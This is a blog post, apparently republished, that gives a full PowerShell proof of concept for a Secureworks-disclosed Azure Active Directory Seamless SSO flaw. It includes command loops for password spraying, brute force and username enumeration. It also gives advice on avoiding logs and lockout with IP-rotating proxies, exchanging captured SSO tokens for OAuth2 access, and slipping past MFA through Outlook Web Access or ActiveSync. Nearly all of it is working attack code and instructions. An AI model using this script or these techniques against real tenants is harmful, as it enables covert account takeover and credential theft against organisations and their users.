POC about secureworks' recent azure Active Directory password brute force vulnerability
2022-06-23 17:44:00 【Khan security team】
POC for Secureworks' recently disclosed Azure Active Directory password brute force vulnerability
Description
This code is a proof of concept for the Azure Active Directory password brute force vulnerability recently disclosed by Secureworks.
Theoretically, this method allows brute force or password spray attacks against one or more AAD accounts without locking the account or generating log data, which makes the attack invisible.
Usage
The basic usage is simple:
.\aad-sso-enum-brute-spray.ps1 USERNAME PASSWORD
Calling the code this way returns the result for the specified username and password.
Password spraying
By using a foreach loop, you can easily use it for password spraying:
foreach($line in Get-Content .\all-m365-users.txt) {.\aad-sso-enum-brute-spray.ps1 $line Passw0rd! | Out-File -FilePath .\spray-results.txt -Append }
Please note that if you want to use this method on Linux, you need to convert the generated file from UTF-16 to UTF-8:
iconv -f UTF16 -t UTF-8 spray-results.txt > new-spray-results.txt
User enumeration
If you are only interested in enumeration, just run the password spray as described above. Any return value other than "bad password" or "no user" means you have found a valid username.
A username returning "True" means the supplied password is valid.
A return value of "locked" may mean the account is locked, or that Smart Lockout is temporarily preventing you from interacting with the account.
Brute force
To use the code for brute forcing, just iterate over the password field instead of the username field:
foreach($line in Get-Content .\passwords.txt) {.\aad-sso-enum-brute-spray.ps1 USERNAME $line | Out-File -FilePath .\brute-results.txt -Append }
What to do after finding a valid username/password pair
If you find one or more valid username/password pairs, you can modify this code to capture the returned DesktopSSOToken. You can then exchange the DesktopSSOToken for an OAuth2 access token.
The OAuth2 access token can then be used with a variety of Azure, M365 and O365 API endpoints.
However, at this point you may trip MFA. The best approach is to take advantage of non-MFA access, for example Outlook Web Access or ActiveSync.
Important note
If you hit the API endpoint too quickly from the same IP address, Microsoft's Smart Lockout feature will start falsely claiming that the account is locked. To work around this, I strongly recommend using ustayready's fireprox. Just change the $url variable:
$url = "https://xxxxxxx.execute-api.us-east-1.amazonaws.com/fireprox/" + $requestid
However, if you are trying to brute force the password of a specific account, this will not bypass Smart Lockout.
aad-sso-enum-brute-spray.ps1
$requestId = (New-Guid).ToString()
$user = $Args[0]
$domain = $user.Split("@")[1]
$password = $Args[1]
$now = Get-Date
$created = $now.toUniversalTime().toString("o")
$expires = $now.addMinutes(10).toUniversalTime().toString("o")
$url = "https://autologon.microsoftazuread-sso.com/$domain/winauth/trust/2005/usernamemixed?client-request-id=$requestid"
$body = @"
<?xml version='1.0' encoding='UTF-8'?>
<s:Envelope xmlns:s='http://www.w3.org/2003/05/soap-envelope' xmlns:wsse='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd' xmlns:saml='urn:oasis:names:tc:SAML:1.0:assertion' xmlns:wsp='http://schemas.xmlsoap.org/ws/2004/09/policy' xmlns:wsu='http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd' xmlns:wsa='http://www.w3.org/2005/08/addressing' xmlns:wssc='http://schemas.xmlsoap.org/ws/2005/02/sc' xmlns:wst='http://schemas.xmlsoap.org/ws/2005/02/trust' xmlns:ic='http://schemas.xmlsoap.org/ws/2005/05/identity'>
<s:Header>
<wsa:Action s:mustUnderstand='1'>http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue</wsa:Action>
<wsa:To s:mustUnderstand='1'>$url</wsa:To>
<wsa:MessageID>urn:uuid:$((New-Guid).ToString())</wsa:MessageID>
<wsse:Security s:mustUnderstand="1">
<wsu:Timestamp wsu:Id="_0">
<wsu:Created>$created</wsu:Created>
<wsu:Expires>$expires</wsu:Expires>
</wsu:Timestamp>
<wsse:UsernameToken wsu:Id="uuid-$((New-Guid).toString())">
<wsse:Username>$User</wsse:Username>
<wsse:Password>$Password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</s:Header>
<s:Body>
<wst:RequestSecurityToken Id='RST0'>
<wst:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</wst:RequestType>
<wsp:AppliesTo>
<wsa:EndpointReference>
<wsa:Address>urn:federation:MicrosoftOnline</wsa:Address>
</wsa:EndpointReference>
</wsp:AppliesTo>
<wst:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</wst:KeyType>
</wst:RequestSecurityToken>
</s:Body>
</s:Envelope>
"@
$exists = $false
try
{
$response = Invoke-RestMethod -UseBasicParsing -Uri $url -Method Post -Body $body -ErrorAction SilentlyContinue
$exists = $true # Very bad password
}
catch
{
$stream = $_.Exception.Response.GetResponseStream()
$responseBytes = New-Object byte[] $stream.Length
$stream.Position = 0
$stream.Read($responseBytes,0,$stream.Length) | Out-Null
$responseXml = [xml][text.encoding]::UTF8.GetString($responseBytes)
$errorDetails = $responseXml.Envelope.Body.Fault.Detail.error.internalerror.text
}
# Parse the error code. Only AADSTS50034 would need to be checked but good to know other errors too.
if(!$exists -and $errorDetails)
{
if($errorDetails.startsWith("AADSTS50053")) # The account is locked, you've tried to sign in too many times with an incorrect user ID or password.
{
$exists = "locked"
}
elseif($errorDetails.StartsWith("AADSTS50126")) # Error validating credentials due to invalid username or password.
{
$exists = "bad password"
}
elseif($errorDetails.StartsWith("AADSTS50056"))
{
$exists = "exists w/no password"
}
elseif($errorDetails.StartsWith("AADSTS50014"))
{
$exists = "exists, but max passthru auth time exceeded"
}
elseif($errorDetails.StartsWith("AADSTS50076")) # Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access '{resource}'
{
$exists = "need mfa"
}
elseif($errorDetails.StartsWith("AADSTS700016")) # Application with identifier '{appIdentifier}' was not found in the directory '{tenantName}'. This can happen if the application has not been installed by the administrator of the tenant or consented to by any user in the tenant. You may have sent your authentication request to the wrong tenant.
{
$exists = "no app"
}
elseif($errorDetails.StartsWith("AADSTS50034")) # The user account {identifier} does not exist in the {tenant} directory. To sign into this application, the account must be added to the directory.
{
$exists = "no user"
}
else
{
Remove-Variable exists
}
}
return $user+" "+$exists